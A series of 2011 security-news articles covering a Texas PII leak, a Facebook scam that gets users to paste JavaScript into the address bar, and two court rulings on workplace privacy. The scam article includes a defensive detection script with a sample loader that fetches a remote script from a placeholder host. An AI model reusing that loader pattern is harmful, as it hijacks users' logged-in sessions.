State of Texas exposes data on 3.5 million people

Susan Combs, Comptroller for the state of Texas, announced a massive data leak that resulted in 3.5 million people’s social security numbers, names, addresses and, in some cases, their birth dates and driver’s license numbers being exposed.

Unlike private companies that have had large releases of PII (Personally Identifiable Information) recently, the state of Texas is not providing credit monitoring or other services for the victims of its mistake. It is simply providing sage advice.

The Comptroller’s office discovered on the afternoon of March 31st, 2011 that they had inadvertently placed the private information of the Teacher Retirement System of Texas (TRS), the Texas Workforce Commission (TWC) and the Employees Retirement System of Texas (ERS) on an internet accessible server.

The data was not encrypted, which is a breach of policy, and several other state policy rules designed to protect people’s PII were bypassed as well.

Often when I am talking with people at shows and seminars I ask them if they have an encryption program in place. Nearly always the answer is “Of course! We have deployed encryption to over 80% of our laptops already.”

I then ask about the servers, databases and other critical storage locations of sensitive data and I see a scary look in their eyes… They usually respond with “Oh, that’s OK, that information is all inside of our firewall.”

As we saw with Epsilon and many others before, sensitive data must be protected regardless of the medium or location in which it is stored.

To learn more about what you can do, download our paper “Protecting PII: Take 8 Steps to Protect”.

Facebook scam with a difference – Social Tagging Worldwide avoids rogue apps

Vigilant Naked Security reader Mike Greer, of Cedar Park, Texas, has brought the latest Facebook “profile viewer” scam to our attention.

We write regularly about this sort of scam, which is common on Facebook, on Twitter, and even on both at the same time.

One of the reasons people fall for these scams is that they promise to provide what sounds like useful data – a list of the people who are most interested in your activities. In particular, most of the scams imply that anyone who is stalking you is likely to end up at the top of the list of people who check your profile.

(Of course, the people at the top of the list might equally well be your closest and most trusted friends. But profile view scams sell better on fear than on comfort.)

Most scams of this sort persuade you to install a rogue Facebook application and give it permission to access your account. But this latest scam, centred around a Facebook community called Social Tagging Worldwide, takes a different approach.

The Social Tagging Worldwide page is much more direct. It tries to trick you into pasting JavaScript directly in your browser and running it. Naturally, this bypasses any checks which Facebook might apply to the script if it were served up from, or wrapped inside, a web page sourced from Facebook itself.

Claiming to be “The Official Profile Viewer Application”, the page offers you a link which brings up a Facebook dialog asking you to “complete a 5 second security check to confirm you’re a Facebook user”:

The instructions sound pretty simple, and – unlike many other Facebook scams – don’t involve asking you to take a survey as proof that you aren’t a computer. The instructions may vary depending on your browser, but will look something like this:

The trick is that you aren’t cutting-and-pasting any sort of unique ID into your browser’s address bar. You’re actually pasting a piece of Javascript and asking your browser to run it for you:

This script fetches another script – one intended to run inside pages presented by Facebook. Indeed, if you paste the offending “unique ID script” into your browser’s address bar whilst you’re on a site other than Facebook – e.g. Naked Security – you’ll see a warning that the script needs to come from Facebook itself:

But if your browser is on the original Social Tagging Worldwide community page – which is hosted by Facebook.com – and you are logged into Facebook, the pasted script runs as if it were hosted on facebook.com. Your browser thinks – indeed, effectively knows – that you’re on Facebook, because that’s the domain of the URL you are currently visiting.

The offending script in this case is designed to invite all your friends to join a specific Facebook group. No need for a rogue application.

The moral of this story is simple: BE CAREFUL WHAT YOU PASTE INTO YOUR ADDRESS BAR.

When you explicitly enter a piece of JavaScript, you’re effectively authorising your browser to run that script in the context of the site you’ve just visited. You are effectively bypassing any sort of cross-site scripting protection which either the remote site – in this case, Facebook – or your browser might have in place.

Cross-site scripting is where you trick your browser into running a script from site Y as if it were officially from site X. Pasting a script into the browser side-steps any cross-site scripting protection because there isn’t really any “cross-site” behaviour – you’re manually injecting a script into site X and thus authorising it to run yourself.
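The article’s point is that what the scam page calls a “unique ID” is really executable JavaScript, and that anything pasted into the address bar runs with the full authority of the site currently loaded. As an added illustration (not code from the article, Sophos or Facebook), the following heuristic flags pasted text that carries the tell-tale markers of an address-bar script rather than an identifier. The two sample strings are constructed for this example; the script-like sample uses a placeholder host and only mirrors the generic “fetch another script” pattern the article describes.

```javascript
// Added example: classify text a user is about to paste as "looks like an ID"
// or "looks like an address-bar script". Patterns and samples are constructed
// for this illustration, not taken from the scam described in the article.

// Markers of executable JavaScript that a genuine identifier would never contain.
const SCRIPT_MARKERS = [
  /^\s*javascript:/i,                                      // address-bar script URL scheme
  /document\.createElement\s*\(\s*['"]script['"]\s*\)/i,   // builds a <script> element
  /\.src\s*=\s*['"]https?:/i,                              // points that element at a remote host
  /\bappendChild\s*\(/i,                                   // injects it into the current page
  /\beval\s*\(/i,                                          // evaluates arbitrary code
];

// Returns which markers matched, so a warning can explain *why* the text is suspect.
function classifyPastedText(text) {
  const hits = SCRIPT_MARKERS.filter((re) => re.test(text)).map((re) => re.source);
  return { isScript: hits.length > 0, hits };
}

// Constructed samples: a UUID-style identifier and a bookmarklet-shaped loader.
const SAMPLES = {
  genuineId: "8f3a2c91-0b4e-4d7a-9c1e-5e2f0a6b7c8d",
  pastedScript:
    "javascript:(function(){var s=document.createElement('script');" +
    "s.src='http://PLACEHOLDER.invalid/viewer.js';document.body.appendChild(s);})()",
};

// Stand-alone run: report each sample.
for (const [name, text] of Object.entries(SAMPLES)) {
  const result = classifyPastedText(text);
  console.log(`${name}: ${result.isScript ? "SCRIPT - do not paste" : "plain identifier"}`,
              result.hits);
}
```

A real identifier is an opaque token; the moment pasted text names the DOM, creates a script element or starts with `javascript:`, it is code, and running it from the address bar hands it the same session and origin as the page you are on.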

Incidentally, if you do go through with the instructions in this scam, things proceed rather predictably.

You’re asked to perform another “proof that you are human” test, and this time – I’m sure you’ve guessed already – you need to take a survey. The survey offers a prize – I’m sure you’ve guessed already – of an iPad or an iPhone:

And to win the prize – I’m sure you’ve guessed already – there’s a cost. The advance fee you’ll pay to enter the “competition” depends on your location.

I’m in Singapore right now, where I was expected to send a pricey SMS and agree to accept SMS marketing:

By the way, there’s a simple, non-technical, rule which will protect you from almost all scams of this sort:

IF IT SOUNDS TOO GOOD TO BE TRUE, IT IS TOO GOOD TO BE TRUE!

Make sure that you stay informed about the latest online scams. Join the Sophos Facebook page, where more than 70,000 people regularly share information on threats and discuss the latest security news.

While you’re about it, why not check out our Facebook security best practice guide? Learn how to protect your privacy and identity on Facebook.

Supreme Court Upholds Intrusive Government Background Checks

The Supreme Court ruled unanimously Wednesday that U.S. government contractors must undergo the same background checks as federal employees.

A lower court had declared the checks an unconstitutional “broad inquisition” when applied to the contractors.

The challenged background investigations sought information from any source surrounding an employee’s sex life, finances and drug use. The background checks for contractors were required beginning in 2007, and were challenged by nearly three dozen NASA contractors as being too invasive. The contractors neither sought, nor were granted, security clearances for classified information.

Ruling 8-0, with Justice Elena Kagan recused, the court found there was no breach in the contractors’ right to so-called “informational privacy.” The checks were “reasonable, employment-related inquiries that further the government’s interests in managing its internal operations,” the court concluded.

So the court, in overturning the 9th U.S. Circuit Court of Appeals, agreed with the Obama administration’s contentions that the NASA Jet Propulsion Laboratory workers’ privacy rights were not breached. The government, the court noted, was not releasing the information to the public.

“In light of the protection provided by the Privacy Act’s nondisclosure requirement, and because the challenged portions of the forms consist of reasonable inquiries in an employment background check, we conclude that the government’s inquiries do not violate a constitutional right to informational privacy,” Justice Samuel Alito wrote for the court.

Justice Antonin Scalia, in a concurring opinion joined by Justice Clarence Thomas, said there was no constitutional right to informational privacy — a premise “consistent with constitutional text and tradition.”

Holding such a position, Scalia wrote, “has the attractive benefit of resolving this case” without having to rationalize the background checks.

The Obama administration told the justices the checks were the same type conducted on all federal government workers — now numbering about 14 million. Those background checks were part of a 2004 security directive from President George W. Bush.

The court pointed out that some of the contractors at the Jet Propulsion Laboratory outside of Los Angeles held high-level positions, including the lead “trouble shooter” for the Kepler space observatory. Another was among the lead “trajectory designers” for the Galileo Project and the Apollo moon landings.

Work E-Mail Not Protected by Attorney-Client Privilege, Court Says

E-mails between a client and attorney are no longer considered privileged and confidential if the client writes the messages from a work e-mail account, a California court of appeals has ruled.

The 3-0 decision Thursday by the Sacramento Third Appellate District means that if you intend to sue your employer, don’t discuss the suit with an attorney using company e-mail. The company has a right to access it and use it against you in a court.

“… [T]he e-mails sent via company computer under the circumstances of this case were akin to consulting her lawyer in her employer’s conference room, in a loud voice, with the door open, so that any reasonable person would expect that their discussion of her complaints about her employer would be overheard,” the court wrote.

Case law on electronic privacy in the workplace is slowly evolving, and not always for the best.

The U.S. Supreme Court in July ruled that a police officer’s texts on department pagers were not private. But that ruling was based on grounds other than the Ontario Police Department’s policy that said text messages on work pagers were not private.

The New Jersey Supreme Court said e-mail messages on a personal web-based e-mail account accessed from an employer’s computer were private. But that decision was contingent on the fact that use of such an account was not clearly covered by the company’s policy, and the e-mails in question contained a standard warning that the communications were personal, confidential, attorney-client communications.

In this most recent California appeals case, a secretary claimed her small-business employer became hostile when it found out she was pregnant shortly after being hired in 2004.

The company, Petrovich Development of Sacramento, California, introduced the e-mail at trial “to show Holmes did not suffer severe emotional distress, was only frustrated and annoyed, and filed the action at the urging of her attorney,” the court noted. On appeal, Holmes claimed the lower courts erred in allowing the e-mail into the case, which the developer had won.

The appeals court said Gina Holmes’ e-mails to her lawyer were not confidential because her employer had a written policy that company e-mail was not private and subject to audit.

The court said Holmes “used her employer’s company e-mail account after being warned that it was to be used only for company business, that e-mails were not private, and that the company would randomly and periodically monitor its technology resources to ensure compliance with the policy.”